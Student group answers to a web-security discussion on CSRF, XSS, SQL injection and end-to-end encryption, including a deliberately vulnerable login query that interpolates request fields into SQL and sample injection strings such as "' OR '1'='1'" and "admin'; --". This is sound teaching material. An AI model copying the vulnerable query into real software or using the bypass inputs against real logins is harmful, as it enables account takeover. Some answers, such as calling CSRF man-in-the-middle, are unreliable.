Type of attacks disuccsion

serverAttacks.md

1. What is a CSRF attack? How does it use HTTP requests? And why do we call it the one-click attack?
2. What is an XSS attack? And what is the connection between it and cookies/sessions? And what are the two main categories of XSS?
3. What is SQL injection? and what is the attacker’s intention from it?
4. Consider the below SQL command, where is the vulnerability? think about some ways an attacker can misuse it:

const { username, password } = req.body
let strQry = `SELECT Count(*) FROM Users WHERE username=${username} AND password=${password}`;

5. What does End-to-End encryption means? Share an example of an well-known app using E2EE, how is that app using it?

mohmmad smadi , Gorgees Odisho , Mohamad Sheikh Alshabab , Hayder Abu -Al-Hummos

Q1:
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering, an attacker may trick the users of a web application into executing actions of the attacker’s choosing, The attack takes advantage of the browser includes the user's authentication credentials with every request to the targeted site like when user try to log in, while his request get to the server the attacher or the hacker can implement the request. Man in the middle Is how CSRF can exploit when a user logs into a website, the server typically issues a session cookie to the user. This cookie is stored by the user's browser and is sent automatically with every subsequent request to the same domain. the reason why it's called a one click attack is: the victim typically needs to perform just one action, such as clicking on a link or visiting a malicious website, to unintentionally initiate an attack.

Q2:
Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it. If the app or website lacks proper data sanitization, the malicious link executes the attacker’s chosen code on the user’s system. As a result, the attacker can steal the user’s active session cookie. One of the primary goals of XSS attacks is to steal user authentication tokens or session cookies and attacks can be used to fixate a user's session, where an attacker sets or manipulates the user's session ID

1. Stored XSS (Persistent):

   • Scripts are permanently stored on the server.
   • Executed when users visit a specific page.
   • Impact can last across multiple sessions.

2. Reflected XSS (Non-Persistent):

   • Scripts are embedded in URLs or form inputs.
   • Executed when users interact with a crafted link or form.
   • Typically a one-time event; the script is not stored on the server.

Q3:
a code-based vulnerability that allows an attacker to read and access sensitive data from the database

Q4 :
this the the vulnerable part: (username=${username} AND password=${password}`;),
a way the attackers can misuse it is by: classic SQL injection in which an attacker could input a specially crafted value for the username or password parameter to manipulate the SQL query

Q5:
End2End is basically where whatever is outputted from the server goes out encrypted, and all the way until it reaches the end user, only then is it decrypted. WhatsApp, Before a message ever leaves your device, it's secured with a cryptographic lock, and only the recipient has the keys the keys change with every single message that's sent

Room 11 : Dana Maraqa, Musab Sakhreyah, Aya Abu Al Hummos, Sanad Al Shobaki,

Q1:
Cross-Site Request Forgery (CSRF) is an attack that forces authenticated users to submit a request to a Web application against which they are currently authenticated.CSRF attacks exploit the trust a Web application has in an authenticated user. by using HTTP requests to deceive the victim's browser into sending forged request to a target site where the victim is authenticated.

it is called one-click attack because it usually takes one click on a malicious link or a visit to a malicious website for the attack to initiate.

Q2:
An XSS (Cross-Site Scripting) attack occurs when an attacker injects malicious scripts into content from a trusted website, which then gets executed in the victim's browser.The connection between XSS and cookies/sessions is that attackers often use XSS to steal session cookies or tokens. By injecting scripts that send the user's cookies to the attacker, they can hijack the user's session and impersonate them.

XSS Categories : Stored (persistent): The malicious script is permanently stored on the target server
Reflected(Non-persistent):The malicious script is included in a request sent to the server,and the server includes it in the response.

Q3:

• SQL injection is a type of cyber attack that occurs when an attacker inserts or manipulates malicious SQL code into input fields of a web application
• The goal of SQL injection is to trick the application into executing unintended SQL queries, which can lead to unauthorized access, data manipulation, and potentially full control of the database

Q4-
The SQL command is vulnerable to SQL injection because it directly includes user-provided data (username and password) in the SQL query. An attacker could provide a specially crafted username or password that alters the SQL command. For example, if an attacker provides "admin'; --" as the username, the SQL command becomes SELECT Count(*) FROM Users WHERE username='admin'; -- AND password=${password}, which could allow unauthorized access if 'admin' is a valid username.

or SQL injection can be implemented to change the code from mentioned above to SELECT Count(*) FROM Users WHERE username='' OR '1'='1'; which will always evaluate to true so the authentication for the username and password will always return the data .

Q5-
End-to-End Encryption (E2EE): E2EE is a method of secure communication that prevents third-parties from accessing data while it's transferred from one end system or device to another. A well-known app that uses E2EE is WhatsApp. WhatsApp uses the Signal Protocol to implement end-to-end encryption. When you send a message, it is secured with a lock, and only the recipient has the special key to unlock and read the message.

Jana, Banan, Hala, Hadeel
Q1
A CSRF (Cross-Site Request Forgery) attack involves unauthorized actions taking place on a website using the credentials of a trusted user, often without their knowledge. To prevent such attacks, developers implement security measures like anti-CSRF tokens and follow best practices. In a CSRF attack, the attacker deceives the user into triggering unauthorized commands on a trusted website through a manipulated HTTP request. Developers use anti-CSRF tokens in HTTP requests to validate their authenticity and reduce the risk of unauthorized commands being executed. The term "one-click attack" is used to underscore that in many cases, a single click by the user is sufficient to initiate the attack, using the user's active session on the targeted website to execute unauthorized actions.

Q2
XSS attack is short for cross-site scripting. XSS attacks are type of injection in which attackers inject malicious scripts in the code of trusted websites
Categories:
Reflected XSS (non-persistent / Type I)
Stored XSS (Persistent / Type II)
DOM-based XSS (Type 0)
Connection between XSS and sessions/cookies:
XSS attacks can access the cookies including session cookies of the users so the attacker can impersonate legitimate users and gain unauthorized access.

Q3
SQL injection is a type of cyber attack where an attacker inserts or manipulates malicious SQL (Structured Query Language) code into input fields of a web application. The intention is to exploit vulnerabilities in the application's code that doesn't properly validate or sanitize user input.

The attacker's goals with SQL injection can include:

Unauthorized Access: By injecting malicious SQL code, attackers may gain unauthorized access to a database, retrieve, modify, or delete data.
Data Manipulation: Altering or deleting data within the database, potentially causing data loss or corruption.
Authentication Bypass: Using SQL injection to bypass login mechanisms, gaining access to restricted areas of an application.
Information Disclosure: Retrieving sensitive information from the database that wasn't meant to be accessible, such as usernames, passwords, or other confidential data.

Q4
The provided SQL command is susceptible to SQL injection, a prevalent security vulnerability in web applications. The vulnerability stems from the direct interpolation of user inputs (username and password) into the SQL query string in the given code:

const { username, password } = req.body
let strQry = `SELECT Count(*) FROM Users WHERE username=${username} AND password=${password}`;

• The risk lies in the direct interpolation of user inputs, allowing an attacker to potentially manipulate the SQL query by controlling the values of username and password in a malicious manner. This manipulation could lead to unauthorized actions or the extraction of sensitive information. An example of a malicious input could be:
username: '1'='1';
This input will always evaluate to true, showcasing the potential danger associated with SQL injection vulnerabilities.

Q5
End-to-end encryption refers to a method of secure communication that prevents third-parties from accessing data while it's transferred from one end system or device to another. In this process, the data is encrypted at the sender's end and only the recipient is able to decrypt it. This means that even the service provider or network operator in the middle of the communication cannot access the unencrypted data. It ensures that the data is secure and private throughout the entire communication process.
One well-known app that utilizes end-to-end encryption (E2EE) is WhatsApp. WhatsApp utilizes E2EE to secure all communications, including text messages, voice calls, video calls, and file transfers, between users. When a message is sent, it is encrypted on the sender's device and can only be decrypted by the recipient's device. This ensures that the content of the messages remains private and secure, even if the messages are intercepted during transmission. The use of E2EE in WhatsApp provides users with a high level of privacy and security in their communications.